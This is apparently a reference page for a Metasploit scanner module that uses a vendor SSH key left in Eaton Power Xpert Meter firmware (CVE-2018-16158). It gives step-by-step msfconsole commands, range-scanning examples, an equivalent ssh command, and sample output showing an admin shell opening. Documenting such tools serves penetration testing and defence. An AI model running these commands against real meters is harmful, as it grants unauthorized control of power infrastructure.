Eaton Xpert Meter SSH Private Key Exposure Scanner - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/ssh/eaton_xpert_backdoor metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: Eaton Xpert Meter SSH Private Key Exposure Scanner
Module: auxiliary/scanner/ssh/eaton_xpert_backdoor
Source code: modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
Disclosure date: 2018-07-18
Last modification time: 2021-07-12 22:11:20 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 22
List of CVEs: CVE-2018-16158

Eaton Power Xpert Meters running firmware below version 12.x.x.x or below version 13.3.x.x ship with a public/private key pair that facilitate remote administrative access to the devices. Tested on: Firmware 12.1.9.1 and 13.3.2.10.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/ssh/eaton_xpert_backdoor
msf auxiliary(eaton_xpert_backdoor) > show options
    ... show and set options ...
msf auxiliary(eaton_xpert_backdoor) > set RHOSTS ip-range
msf auxiliary(eaton_xpert_backdoor) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(eaton_xpert_backdoor) > set RHOSTS 192.168.1.3-192.168.1.200

Example 2:

msf auxiliary(eaton_xpert_backdoor) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(eaton_xpert_backdoor) > set RHOSTS file:/tmp/ip_list.txt

Required Options

  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base

Description

The eaton_xpert_backdoor module scans for Eaton Xpert Power meters with a vendor SSH private key used in the device firmware's build process.

Vulnerable Application

Eaton is a power management company with a wide range of power management products. Power meters sold by Eaton used a firmware build process for many years that left a developer key pair in the default profile. Specific models include: Power Xpert Meter 4000/6000/8000

Software Link

Vulnerable Version: Firmware <= 12.x and <= 13.3.x.x and below more versions may be impacted

Tested on: Firmware 12.1.9.1 and 13.3.2.10

Similar to running: ssh -m hmac-sha1 -c aes128-cbc -o KexAlgorithms=diffie-hellman-group1-sha1 -o HostKeyAlgorithms=ssh-rsa -i ./id_rsa [email protected]

Verification Steps

  1. Start msfconsole
  2. use auxiliary/scanner/ssh/eaton_xpert_backdoor
  3. set RHOSTS 1.1.1.2
  4. run -z
  5. Vulnerable hosts should present a shell

Scenarios

msf > use auxiliary/scanner/ssh/eaton_xpert_backdoor
msf auxiliary(scanner/ssh/eaton_xpert_backdoor) > set RHOSTS 1.1.1.2
RHOSTS => 1.1.1.2
msf auxiliary(scanner/ssh/eaton_xpert_backdoor) > run -z

[+] 1.1.1.2:22 - Logged in as admin
[*] Command shell session 1 opened (1.1.1.1:62063 -> 1.1.1.2:22) at 2018-08-31 19:12:21 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Go back to menu.

Msfconsole Usage

Here is how the scanner/ssh/eaton_xpert_backdoor auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/ssh/eaton_xpert_backdoor

msf6 auxiliary(scanner/ssh/eaton_xpert_backdoor) > show info

       Name: Eaton Xpert Meter SSH Private Key Exposure Scanner
     Module: auxiliary/scanner/ssh/eaton_xpert_backdoor
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2018-07-18

Provided by:
  BrianWGray

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    22               yes       The target port
  THREADS  1                yes       The number of concurrent threads (max one per host)

Description:
  Eaton Power Xpert Meters running firmware below version 12.x.x.x or 
  below version 13.3.x.x ship with a public/private key pair that 
  facilitate remote administrative access to the devices. Tested on: 
  Firmware 12.1.9.1 and 13.3.2.10.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2018-16158
  https://www.exploit-db.com/exploits/45283
  http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf
  https://www.ctrlu.net/vuln/0006.html

Module Options

This is a complete list of options available in the scanner/ssh/eaton_xpert_backdoor auxiliary module:

msf6 auxiliary(scanner/ssh/eaton_xpert_backdoor) > show options

Module options (auxiliary/scanner/ssh/eaton_xpert_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    22               yes       The target port
   THREADS  1                yes       The number of concurrent threads (max one per host)

Advanced Options

Here is a complete list of advanced options supported by the scanner/ssh/eaton_xpert_backdoor auxiliary module:

msf6 auxiliary(scanner/ssh/eaton_xpert_backdoor) > show advanced

Module advanced options (auxiliary/scanner/ssh/eaton_xpert_backdoor):

   Name                        Current Setting                          Required  Description
   ----                        ---------------                          --------  -----------
   AutoRunScript                                                        no        A script to run automatically on session creation.
   AutoVerifySession           true                                     yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                                           no        A command to run before the session is closed
   CreateSession               true                                     no        Create a new session for every successful login
   InitialAutoRunScript                                                 no        An initial script to run on session creation (before AutoRunScript)
   SSH_DEBUG                   false                                    no        SSH debugging
   SSH_IDENT                   SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3  yes       SSH client identification string
   SSH_TIMEOUT                 10                                       no        SSH timeout
   ShowProgress                true                                     yes       Display progress messages during a scan
   ShowProgressPercent         10                                       yes       The interval in percent that progress should be shown
   VERBOSE                     false                                    no        Enable detailed status messages
   WORKSPACE                                                            no        Specify the workspace for this module

Auxiliary Actions

This is a list of all auxiliary actions that the scanner/ssh/eaton_xpert_backdoor module can do:

msf6 auxiliary(scanner/ssh/eaton_xpert_backdoor) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the scanner/ssh/eaton_xpert_backdoor auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/ssh/eaton_xpert_backdoor) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

References

See Also

Check also the following modules related to this module:

Authors

  • BrianWGray

Version

This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.